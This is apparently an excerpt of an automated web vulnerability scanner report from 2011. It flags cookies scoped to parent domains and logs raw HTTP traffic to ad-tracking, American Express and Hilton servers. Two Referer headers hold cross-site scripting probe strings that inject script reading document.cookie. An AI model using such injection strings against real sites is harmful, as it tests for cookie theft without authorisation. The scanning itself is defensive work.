The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /al.asp?ts=20110205214821&adid=126828%2C0%2C3841%2C121057%2C0%2C0%2C0&cc=us&di=29848192%2C29951564%2C29471372%2C29167950%2C30018856%2C29875388%2C29651480&hk=1&ipid=18400&mh=57f4673cf4ad79544ac753cf0dd004c8&pid=2%2C2%2C2%2C2%2C2%2C2%2C2&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&pvu=4E02CE94902A497D8EBF5C1016534811&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0%2C0&kp=430%2C971%3B168%2C1189%3B238%2C1238%3B337%2C1717%3B479%2C2214%3B509%2C2742%3B346%2C4628%3B&prf=ll%3A2635%7Cintl%3A2738%7Cpreprochrome%3A2%7Cgetconchrome%3A251%7Ccontint%3A3224%7Ccontl%3A6220%7Cadvint%3A351%7Cadvl%3A6571%7Ctl%3A6773&jscallback=$iTXT.js.callback19 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:48:02 GMT; Path=/
Content-Type: text/javascript
Content-Length: 39
Date: Sat, 05 Feb 2011 21:48:01 GMT
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=18400 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AIAAAEt7DS2iwA-
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:47:53 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:47:53 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 21:47:53 GMT
Connection: close
Content-Length: 10683
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /eas?camp=31618;cre=mu;js=y;target=_blank;ord=[timestamp];EASClick= HTTP/1.1
Host: eas.statcamp.net
Proxy-Connection: keep-alive
Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quant.js HTTP/1.1
Host: edge.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
ETag: "18382:E0-149392971-1296944707933"
Vary: Accept-Encoding
Last-Modified: Sat, 05-Feb-2011 22:25:07 GMT
Content-Type: application/x-javascript
Set-Cookie: mc=4d4dce43-e3fa1-533c1-60d39; expires=Sat, 05-Feb-2021 22:25:07 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Sun, 06 Feb 2011 22:25:07 GMT
Content-Length: 5265
Date: Sat, 05 Feb 2011 22:25:07 GMT
Server: QS
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CE[CE]; Expires=Fri, 5 Feb 2016 16:01:18 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/emgrelatedcontent/1/H.19.4/s23179186573252 HTTP/1.1 Host: enterprisemediagroup.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_jyx7Bskhyx7Bx7Dx7Ftwzytjyx7Bskhyx7Bx7D=[CS]v4|26A6B52B85011D42-6000010FC0072A22|4D4D6A14[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_maitcx7Cibx7Cx7Ech=[CS]v4|26A62673051D24FA-40000102A01BFE08|4D4C4CE1[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x60sqyabsqwx7Fx7Daax7Dfwaf=[CS]v4|26A6B50A85011110-6000010AA002E73C|4D4D6A14[CE]; s_vi_mx7Eqqsvax7Edtx7Fvyyrx7Bx7Eydx7Esre=[CS]v4|26A6AAA485161A8B-40000177E007F5AA|4D4D5548[CE]; s_vi=[CS]v1|26A7503405012723-40000106C0020AE2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE];
Response
HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 16:01:18 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CE[CE]; Expires=Fri, 5 Feb 2016 16:01:18 GMT; Domain=.2o7.net; Path=/
Location: http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s23179186573252?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 05 Feb 2011 16:01:18 GMT
Last-Modified: Mon, 07 Feb 2011 16:01:18 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www616
Content-Length: 0
Content-Type: text/plain
Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CF[CE]; Expires=Fri, 5 Feb 2016 16:01:19 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/emgrelatedcontent/1/H.19.4/s29905151680577 HTTP/1.1 Host: enterprisemediagroup.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26A6AAA485161A8B-40000177E007F5AC|4D4EA057[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_jyx7Bskhyx7Bx7Dx7Ftwzytjyx7Bskhyx7Bx7D=[CS]v4|26A6B52B85011D42-6000010FC0072A22|4D4D6A14[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_maitcx7Cibx7Cx7Ech=[CS]v4|26A62673051D24FA-40000102A01BFE08|4D4C4CE1[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x60sqyabsqwx7Fx7Daax7Dfwaf=[CS]v4|26A6B50A85011110-6000010AA002E73C|4D4D6A14[CE]; s_vi_mx7Eqqsvax7Edtx7Fvyyrx7Bx7Eydx7Esre=[CS]v4|26A6AAA485161A8B-40000177E007F5AA|4D4D5548[CE]; s_vi=[CS]v1|26A7503405012723-40000106C0020AE2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_kxxwwupgxxbspbtx7Dxxx7Ft=[CS]v4|26A7502C850132CA-6000010CE0000D64|4D4EA057[CE];
Response
HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 16:01:19 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tx7Cvctx7Dpeturx7Ex7Fetx7Fe=[CS]v4|0-0|4D4EC5CF[CE]; Expires=Fri, 5 Feb 2016 16:01:19 GMT; Domain=.2o7.net; Path=/
Location: http://enterprisemediagroup.112.2o7.net/b/ss/emgrelatedcontent/1/H.19.4/s29905151680577?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 05 Feb 2011 16:01:19 GMT
Last-Modified: Mon, 07 Feb 2011 16:01:19 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www492
Content-Length: 0
Content-Type: text/plain
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 05 Feb 2011 23:32:44 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=XBvt5onSLx9jPcXP90cfRA; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Sat, 05 Feb 2011 23:32:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /add HTTP/1.1
Host: fusion.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/ig/add">he ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /group/jquery-dev/browse_thread/thread/36395b7ab510dd5d HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
hilton-portal=HHONORS; Domain=hilton.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_US/hh/home_index.do HTTP/1.1 Host: hhonors1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/corporations.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/global_splash.html HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT Server: IBM_HTTP_Server Content-Type: text/html Cache-Control: no-store Expires: Sat, 05 Feb 2011 21:50:49 GMT Date: Sat, 05 Feb 2011 21:50:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: bandwidthdetect=vhigh; expires=Mon, 07-Mar-2011 21:50:49 GMT; path=/; domain=.americanexpress.com Content-Length: 37032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252"> <STYLE type='text/css ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/mt_personal.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rs?id=55a98cbe3a9546199c35c06090cd400c&t=marketing HTTP/1.1 Host: i.w55c.net Proxy-Connection: keep-alive Referer: http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=aarp.thehartford.com,foxnews8.com,carinsuranceweb.com,geinterestplus.com,digestaqure.com&p=0.000700179100183313&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&cbb=0x5FAA34DC317211E0BEB038273F87B1CA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /px?bidder=13&seg=49740&qsdata=7431457a-2008-4af6-823b-5fab70668c12:4441692.10781187.8722&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fadv%3D95413%26t%3D2%26id%3D862779%26id%3D666786%26id%3D866803 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r3INe$Nse]R5qr(JDc]-bWILQB2sBm?]5DT.u]:Zm4o)>bs>qIstFH2uSVdZOfDa#wO0R(sY4r'3M3uns400rod$m8jW.pf5$ej(%p3G.wRelFvr1B#3[<j]fLzoYV-Xoc/-u3lfOY2l0^)m+4onJH+'Mp3Z`oaUPGOSO$-([rR[3FKwxy.<d5h_99O>?lEs92JnU<Ym/AN[[N1bi!f/GpSnI+nbI[<DT:[E6Ypx.YVf>TazTBV(V/*F_VMmMdtq(6bR%^6j]b`n>tuf]8.Y_seRWLWR]!?WOOw[T0*U7h_.w+G6qub*wc[_dCF
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r3INe$Nse]R5qr(JDc]-bWILQB2sBm?]5DT.u]:Zm4o)>bs>qIstFH2uSVdZOfDa#wO0R(sY4r'3M3uns400rod$m8jW.pf5$ej(%p3G.wRelFvr1B#3[<j]fLzoYV-Xoc/-u3lfOY2l0^)m+4onJH+'Mp3Z`oaUPGOSO$-([rR[3FKwxy.<d5h_99O>?lEs92JnU<Ym/AN[[N1bi!f/GpSnI+nbI[<DT:[E6Ypx.YVf>TazTBV(V/*F_VMmMdtq(6bR%^6j]b`n>tuf]8.Y_seRWLWR]!?WOOw[T0*U7h_.w+G6qub*wc[_dCF; path=/; expires=Fri, 06-May-2011 21:54:31 GMT; domain=.adnxs.com; HttpOnly Location: http://ad.yieldmanager.com/pixel?adv=95413&t=2&id=862779&id=666786&id=866803 Date: Sat, 05 Feb 2011 21:54:31 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?add=56500&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D966993%26t%3D2%26piggyback%3Dhttp%253A%252F%252Fwww.googleadservices.com%252Fpagead%252Fconversion%252F1030878771%252F%253Flabel%253DwJh2CPel9gEQs-zH6wM%2526amp%253Bguid%253DON%2526amp%253Bscript%253D0 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:Cbsw06/r_>(PNo/dsdulhFKS$1s!(vV#<ay/z?S_+aDM84inGc7u2rDS2.zVfL+uQn0[J!3d#weum*9[*jy.Zj.x7`vo:SHJ4I_sG7M.kwz%lFX:g=(9O<LOsM-gBXD!CJa_$L.-ARC1SuPl*u(p<pOEcF@:XJvR6`HCTmJ$j:2Vw2t1N:6hSg>f@HJ@R]mWLzbKwefWvevrk96VBPMVx:Rur'4ww:QD+5(f7JRTJUg#.vO@7qBkVu49G!Cw8S>SEFAwEGx/tTLnxS+PjhL%oZuWg9S%4dmU@eOBwGwewGg7x.jZ[Cv=@.Y')7H4K_[7s:8jt(P+HFPd4YN@NmDc3!t9tZagexo%(H43rh$$E`ntW0id[=iN2rA[0q0D:^b-'7[39d9LmUaRg`LG.JfteCRbGx8f/m3D3HD<Tre9Y!*Z>/U5lrg; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:Cbsw06/r_>(PNo/dsdulhFKS$1s!(vV#<ay/z?S_+aDM84inGc7u2rDS2.zVfL+uQn0[J!3d#weum*9[*jy.Zj.x7`vo:SHJ4I_sG7M.kwz%lFX:g=(9O<LOsM-gBXD!CJa_$L.-ARC1SuPl*u(p<pOEcF@:XJvR6`HCTmJ$j:2Vw2t1N:6hSg>f@HJ@R]mWLzbKwefWvevrk96VBPMVx:Rur'4ww:QD+5(f7JRTJUg#'5Hn>Mf$DPoeIj+(UBb/RT'-+(e0HtST(7NvgCy/NzlGv!ue5qei+Vmp=QxY'-[.sh/@U6W:7+<WN$/lq+]u7CSOdM#`>w4PcOF<!T>>bfS6Jd@H0$wo[Me9i0XM:R%-#w!B7_<Qs2[31P@bSLNQrB$1[N[y:*NZTHom)%2w7oS__r*]Z8K<k8H)CkdDN!x!*>XHsqp; path=/; expires=Fri, 06-May-2011 21:49:55 GMT; domain=.adnxs.com; HttpOnly Location: http://ad.yieldmanager.com/pixel?id=966993&t=2&piggyback=http%3A%2F%2Fwww.googleadservices.com%2Fpagead%2Fconversion%2F1030878771%2F%3Flabel%3DwJh2CPel9gEQs-zH6wM%26amp%3Bguid%3DON%26amp%3Bscript%3D0 Date: Sat, 05 Feb 2011 21:49:55 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /setuid?entity=25&code=6ch47d7o8wtv HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r3INe$Nse]R5qr(JDc]-bWILQB2sBm?]5DT.u]:Zm4o)>bs>qIstFH2uSVdZOfDa#wO0R(sY4r'3M3uns400rod$m8jW.pf5$ej(%p3G.wRelFvr1B#3[<j]fLzoYV-Xoc/-u3lfOY2l0^)m+4onJH+'Mp3Z`oaUPGOSO$-([rR[3FKwxy.<d5h_99O>?lEs92JnU<Ym/AN[[N1bi!f/GpSnI+nbI[<DT:[E6Ypx.YVf>TazTBV(V/*F_VMmMdtq(6bR%^6j]b`n>tuf]8.Y_seRWLWR]!?WOOw[T0*U7h_.w+G6qub*wc[_dCF
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 06-May-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]c-Pm=I<a8V/B>i:PSmg^W3vm%A/@8r3Ib7v=>m+B5c('NFWahIM3Tid.'cw2S@9Z$dAwm#D/YhNsF[J<3Yw68ZyGIEu._vlp(S9jjKv9Zx#gVh89rL/O_7kynysL`8KDXqIe+_76zEk@/WFM1r>XmoaYwfT>MaC9F3'@R)b+7/JAm!4$Z$J[)Xs%mpEI_OXEMI#3V8`vbdfy1tOnbaoJ3^ud^C@Q*e<Iyr)#(+Tg6wsA28?%iN0w93NPILtzptUr-G#'csDyV.cfuJDUw9rPkg=:/O)Q?WwIBGi0yY]E5tE_X3Cv=-F%rw+e:SY5$b0gwbe8)$@SH#%)#y<Vzz_ePJ?/BRyEUS#'J#!.$DD2PP9?oe?P+5+<^TJZ_71>/AF_w>M_7BQ$:U=wcjwaYgA6+2x+7Wsqjl^o2[dMS2Eb.K:w!W#9E)!v'vIAAa=SMsTjRRn@)*DB/x>Z; path=/; expires=Fri, 06-May-2011 22:36:10 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Sat, 05 Feb 2011 22:36:10 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Segment.aspx?sid=09702beb-9542-4386-99e6-df305b62b1f7 HTTP/1.1 Host: idcs.interclick.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T=1; uid=u=288a8646-9d10-4b7b-b3df-da84333799f7; tpd=e20=1299342742748&e90=1297355542778&e100=1296677943305; sgm=9583=734162&8278=734163&8069=734170&7596=734172&6159=734172&10272=734172
Response
